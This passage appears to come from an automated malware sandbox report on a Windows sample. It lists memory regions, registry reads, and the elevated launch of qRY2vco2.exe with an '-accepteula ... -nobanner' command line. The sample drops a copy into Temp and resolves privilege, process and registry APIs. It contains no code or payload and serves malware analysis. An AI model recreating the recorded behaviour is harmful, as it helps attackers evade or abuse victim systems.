| private_0x0000000004dc0000 | 0x04dc0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ec0000 | 0x04ec0000 | 0x04ec3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ef0000 | 0x04fadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x04feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ff3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0504ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x052affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x052affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052b0000 | 0x055e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e700000 | 0x7e700000 | 0x7e7fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e800000 | 0x7e800000 | 0x7e822fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e827000 | 0x7e827000 | 0x7e829fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e82a000 | 0x7e82a000 | 0x7e82cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e82d000 | 0x7e82d000 | 0x7e82dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e82f000 | 0x7e82f000 | 0x7e82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 226, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x958, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #183: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #183 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "WinMail.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed4 |
| Parent PID | 0xee8 (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
45C
0x
D74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x01ebffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
